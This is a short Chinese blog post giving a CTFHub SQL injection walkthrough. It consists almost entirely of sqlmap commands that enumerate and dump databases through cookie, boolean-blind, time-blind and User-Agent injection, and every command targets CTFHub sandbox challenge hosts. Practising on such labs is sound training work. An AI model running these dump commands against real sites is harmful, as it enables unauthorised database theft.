ctfhub sql注入
cookie 注入:
sqlmap -u http://challenge-669e2dd09459b836.sandbox.ctfhub.com:10800 --cookie "id=1" --level 2 -D sqli -T oycbkxjjrk --dump-all
布尔盲注
sqlmap -u http://challenge-06261cd9d86e50a8.sandbox.ctfhub.com:10800/?id=1 --dbs
sqlmap -u http://challenge-06261cd9d86e50a8.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables
sqlmap -u http://challenge-06261cd9d86e50a8.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag --dump-all
时间盲注
sqlmap -u http://challenge-7a9890ce6a9f98c7.sandbox.ctfhub.com:10800/?id=1 --dbs
sqlmap -u http://challenge-7a9890ce6a9f98c7.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag --dump-all --batch
MySQL结构
sqlmap -u http://challenge-47524cd308308605.sandbox.ctfhub.com:10800/?id=1 --dbs --batch
sqlmap -u http://challenge-47524cd308308605.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables --batch
sqlmap -u http://challenge-47524cd308308605.sandbox.ctfhub.com:10800/?id=1 -D sqli -T ljhjacknvw --dump-all --batch
UA注入
sqlmap -u http://challenge-7fd646ecd55291c2.sandbox.ctfhub.com:10800/ --level 3 -T sqli -T ybfcldqlgg --dump-all --batch
本文来自博客园,作者:admax11,转载请注明原文链接:https://www.cnblogs.com/ctfisnull/p/15017543.html